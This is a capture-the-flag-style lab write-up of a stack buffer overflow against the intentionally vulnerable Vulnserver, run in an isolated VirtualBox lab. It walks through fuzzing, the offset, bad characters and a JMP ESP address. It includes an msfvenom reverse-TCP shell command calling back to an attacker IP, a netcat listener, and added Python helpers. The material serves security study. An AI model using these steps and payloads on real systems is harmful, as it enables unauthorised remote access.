Vulnserver is an intentionally vulnerable program introduced by Stephen Bradshaw in 2010. It serves the purpose of providing a place for him to improve his coding abilities and to test various shellcode and other exploits. He encourages others to find exploits in the server, but for the purpose of this document I will focus on flooding the memory buffer with malicious shellcode, which will give me access to the Windows machine through a shell on my Kali OS. Vulnserver can be downloaded here.

Lab setup

I'm using the VirtualBox hypervisor with Kali 4.6.4 and Windows 7/IE 8 virtual machines. Installed on the Windows machine is the SLmail pop server and Immunity Debugger, with the mona.py script placed in the python commands folder within Immunity Debugger. The firewall in Windows has been turned off to simulate a real-world security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a misconfiguration. This exercise shows a consequence of failing to audit a system: the system is exploited and sensitive files are exposed.

Vulnserver can be downloaded from https://github.com/stephenbradshaw/vulnserver
Kali can be downloaded from http://www.kali.org
Immunity debugger: https://www.immunityinc.com/products/debugger/index.html
Virtualbox: https://www.virtualbox.org/wiki/Downloads
Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

Once the VMs are set up, I made sure they are on the 'host only' network so they are kept from being exposed to the internet. The VMs should be on the same network and able to ping each other. As a side note, my host operating system is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround is to create a shared folder on the host that is accessible to the VMs. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows.

The goal of the exercise is to redirect EIP to a JMP ESP address, leading the execution flow to the shellcode I inject into memory.

Immunity configuration

Within Immunity Debugger, set the working folder to c:\logs by issuing the command:

!mona config -set workingfolder c:\logs

All documents created by Mona will be found there. First, I need to verify the crash of the application by using a poc.py script to fuzz it. The exploit variable will send 2500 'A's to verify that the program is vulnerable to a stack-based buffer overflow.
Simple buffer test

Figure: 2500 'A's sent to the server

Here is a snapshot of the whole exploit to start with. It is written in Python and imports the socket module to make a connection to the remote Vulnserver. It sends 2500 'A's along with the 'TRUN' command, which the server is vulnerable to. The server IP is the IP address of my Windows machine where Vulnserver resides, and the port it uses is 9999, which I found from a simple nmap scan of the IP address.

Figure: Initial exploit
Nmap scan

Figure: Nmap scan of the Windows machine

Crashing the program

After running this program from the Kali terminal, the result shows that the program crashes and ESP contains many 'A's ('41' in hex). This shows that the boundary hasn't been checked, as I can inject my own data into the program and cause it to crash. Each time the program is crashed, Vulnserver needs to be restarted and its process attached to Immunity.
A unique string

In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset address located from the debugger. Use the Immunity command !mona pc 2500 to create a unique string of characters. There is also a tool within Kali which does the same thing, located at /usr/share/metasploit-framework/tools/exploit/pattern_create. Copy the unique string into the simple program and send it to Vulnserver, i.e. exploit = 'Aa0Aa1Aa2Aa....' instead of the 'A's. The unique pattern string will be found in the c:\logs working folder after using the mona command.

Figure: The same string created from Kali
Note the exploit was changed from 'A's to the unique string created. Then it was sent to Vulnserver to crash it again. After the crash, locate the value in EIP. The memory address in this case is 396f4338, as indicated by Immunity Debugger. To find its position in the pattern, issue the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit-framework/tools/exploit/pattern_offset -q 396f4338 to find its location), e.g.

!mona po 396f4338
Pattern Offset

The pattern offset was found at position 2006, so the exploit is changed to offset = 'A'*2006. EIP will be the next 4 bytes in memory, so the buffer now becomes 'A'*2006 + 'B'*4. Run the script to verify control of EIP by noting that the 4 'B's get written to the EIP register. You can see the 4 'B's at the end of the 'A's. This is where your JMP ESP address will go a little later.

Figure: EIP has 4 'B's written to it

The bytearray

Use Immunity !mona bytearray to create a list of all the possible hex characters. The file will be saved to c:\logs. Copy the string into the program and send it in the exploit to view any truncation caused by bad characters, and eliminate them one by one until a clean set of characters can be passed to the program without issue. Below, all possible hex characters are illustrated. It is important to remove these bad characters so that the shellcode will run successfully.
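To show what the pattern_create / pattern_offset step above actually computes, here is an added example (not code from the report, and not mona's or Metasploit's own code) that rebuilds the cyclic pattern, looks up the EIP value 396f4338 from the crash, and builds the 'A'*offset + 'B'*4 control buffer. It assumes the standard Metasploit pattern alphabet (uppercase, lowercase, digit triples).

```python
# Added example: re-implementation of the cyclic-pattern offset lookup used in
# the report (mona pc / mona po, pattern_create / pattern_offset). Constructed
# for this page; it is not the report's poc.py.
import itertools
import string
import struct


def pattern_create(length):
    """Build the 'Aa0Aa1Aa2...' pattern: every 3-byte triple occurs once."""
    triples = (
        up + lo + dg
        for up in string.ascii_uppercase
        for lo in string.ascii_lowercase
        for dg in string.digits
    )
    pattern = "".join(itertools.islice(triples, length // 3 + 1))
    return pattern[:length]


def pattern_offset(eip_value, length=2500):
    """Return the offset in the pattern of the 4 bytes that landed in EIP.

    eip_value is the register as the debugger prints it (0x396f4338). x86 reads
    it from the stack little-endian, so the bytes appear in the pattern in
    reverse order: 0x396f4338 -> b'8Co9'.
    """
    needle = struct.pack("<I", eip_value).decode("ascii")
    pos = pattern_create(length).find(needle)
    if pos < 0:
        raise ValueError("EIP value not in pattern; send a longer pattern")
    return pos


def build_control_buffer(offset):
    """The 'A'*offset + 'B'*4 check from the report: the B's must reach EIP."""
    return b"A" * offset + b"B" * 4


if __name__ == "__main__":
    off = pattern_offset(0x396F4338)
    print(f"396f4338 is {struct.pack('<I', 0x396F4338)!r} at offset {off}")
    buf = build_control_buffer(off)
    print(f"buffer is {len(buf)} bytes; EIP receives {buf[off:off + 4]!r}")
```

The lookup returns 2006, the same offset the report obtained from !mona po.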
Send the bytearray from the exploit, offset = 'A'*2006 + 'B'*4 + badchars, to see if there is any truncation caused by characters from the array. The picture with truncation happening shows that the 00 character is causing problems, indicated by the run of 00s that follows it.
Truncation

Figure: Truncation
Figure: No more truncation after the 00 byte is removed

After bad character \x00 is removed there is no more truncation. The hex string is successfully inserted into the memory buffer without problems. This byte will be excluded when creating the shellcode with msfvenom later on in the exercise.

Use Immunity !mona modules -o to find the modules loaded with Vulnserver that could be used for the exploit. ASLR and DEP are security protections (among other things, ASLR randomizes the memory address at which a JMP ESP would be found), and modules that have these protections active should not be selected. There are instances where they are not used because common program instructions need to work without them. I chose essfunc.dll. The -o option filters out the operating system modules to whittle the module list down to relevant listings.
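The bytearray and truncation steps above can be expressed as a send/compare cycle; the following is an added example (not the report's code, and not mona's !mona bytearray or !mona compare) that generates the bytearray, locates the first byte where memory diverges from what was sent, and repeats until the copy is clean. The target is a constructed stand-in that reproduces the behaviour the report observed (the copy stops at the first 00 byte).

```python
# Added example: bad-character discovery as the report performs it with mona,
# reproduced in Python. simulate_target is a constructed model, not Vulnserver.
from typing import Optional, Tuple


def make_bytearray(exclude: frozenset = frozenset()) -> bytes:
    """Every value 0x00..0xff except those already known bad (mona bytearray -b)."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(sent: bytes, in_memory: bytes) -> Optional[Tuple[int, int]]:
    """Find the first divergence between the bytes sent and the debugger dump.

    Returns None for a clean copy, else (index, suspect_byte). If everything
    after the divergence is one repeated filler value (the '00 00 00 ...' seen
    in the report) the copy stopped, so the byte *before* the divergence is the
    suspect; otherwise the byte at the divergence was altered in place.
    """
    for i, (s, m) in enumerate(zip(sent, in_memory)):
        if s != m:
            truncated = i > 0 and len(set(in_memory[i:])) == 1
            return i, (sent[i - 1] if truncated else sent[i])
    return None


def simulate_target(buf: bytes) -> bytes:
    """Constructed model of the observed behaviour: a C string copy stops at
    the first NUL and leaves the rest of the stack buffer zeroed."""
    copied = buf.split(b"\x00", 1)[0]
    return copied + b"\x00" * (len(buf) - len(copied))


def find_bad_chars(probe=simulate_target) -> bytes:
    """Repeat the send/compare cycle until a clean bytearray reaches memory."""
    bad: set = set()
    while True:
        sent = make_bytearray(frozenset(bad))
        result = compare(sent, probe(sent))
        if result is None:
            return bytes(sorted(bad))
        bad.add(result[1])


def msfvenom_bad_arg(bad: bytes) -> str:
    """Format the excluded bytes the way msfvenom -b expects, e.g. '\\x00'."""
    return "".join(f"\\x{b:02x}" for b in bad)


if __name__ == "__main__":
    found = find_bad_chars()
    print("bad characters:", msfvenom_bad_arg(found))
```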
JMP ESP

Use Immunity !mona find -s '\xff\xe4' -m .dll to find the location of a JMP ESP instruction. I verify the address contains a jmp esp by searching for that memory address in the debugger. The JMP ESP in my case is located at 625011af. Written in little-endian format, it becomes '\xaf\x11\x50\x62' in the exploit. I replace the 'B's with the JMP ESP address in little-endian format. Since I control EIP, I can direct it to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode.

To create a payload in Kali without the bad characters and insert it as a variable in the script, I type:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=443 -f py -a x86 --platform windows -b '\x00'

The exploit becomes exploit = offset + JMP ESP + nops + buf
(offset is the memory just before EIP)
(JMP ESP is the address written into EIP)
(buf is the shellcode created in Kali which contains my reverse TCP shell; in this case there is just a snippet of the shellcode)
(nops are sent to create a little space and be sure that the shellcode gets run in the memo
The final Exploit compiled

Figure: Final exploit
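As an added example (not the report's code and not mona's implementation of !mona find), this shows what the search for '\xff\xe4' does over a module image, why 625011af is written as '\xaf\x11\x50\x62', and why an address containing a bad character is rejected. The module image is constructed: it assumes a module mapped at 0x62500000 so that the report's address 625011af falls inside it, and contains nothing real.

```python
# Added example: JMP ESP search over a constructed module image, plus the
# little-endian encoding the report uses for 625011af. Not Vulnserver code.
import struct

JMP_ESP = b"\xff\xe4"  # x86 encoding of the JMP ESP instruction


def find_jmp_esp(image: bytes, base: int):
    """Return every virtual address in `image` (mapped at `base`) holding JMP ESP."""
    hits, start = [], 0
    while True:
        i = image.find(JMP_ESP, start)
        if i < 0:
            return hits
        hits.append(base + i)
        start = i + 1


def to_little_endian(addr: int) -> bytes:
    """0x625011af -> b'\\xaf\\x11\\x50\\x62': the order the bytes are sent in."""
    return struct.pack("<I", addr)


def usable_addresses(addrs, bad_chars: bytes = b"\x00"):
    """Drop addresses whose little-endian form contains a known bad character."""
    return [a for a in addrs if not any(b in bad_chars for b in to_little_endian(a))]


# Constructed module image (assumption): mapped at 0x62500000, 8 KiB of zeros
# with two JMP ESP gadgets planted by hand. One sits at offset 0x11af so the
# address matches the report's 625011af; the other sits at offset 0 so its
# address 62500000 contains 00 bytes and must be rejected.
FAKE_BASE = 0x62500000
FAKE_IMAGE = bytearray(0x2000)
FAKE_IMAGE[0x11AF:0x11B1] = JMP_ESP
FAKE_IMAGE[0x0000:0x0002] = JMP_ESP


if __name__ == "__main__":
    found = find_jmp_esp(bytes(FAKE_IMAGE), FAKE_BASE)
    for addr in usable_addresses(found):
        print(f"{addr:08x} -> {to_little_endian(addr)!r}")
```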
Shell received

Set up a netcat listener in Kali so the Windows machine has a place to connect to:

nc -lvp 443

Send the exploit ./poc.py to Vulnserver.

A shell is gained on the compromised Windows machine by exploiting a vulnerability in the Vulnserver program. There was no boundary check on the user input, so I was able to make the program crash and gain entry to the system. The next phase of the process is post-exploitation, where I can perform data exfiltration and move laterally through various machines on the network. Other useful information can be gained from other computers, printers, and routers.

Figure: System information gathered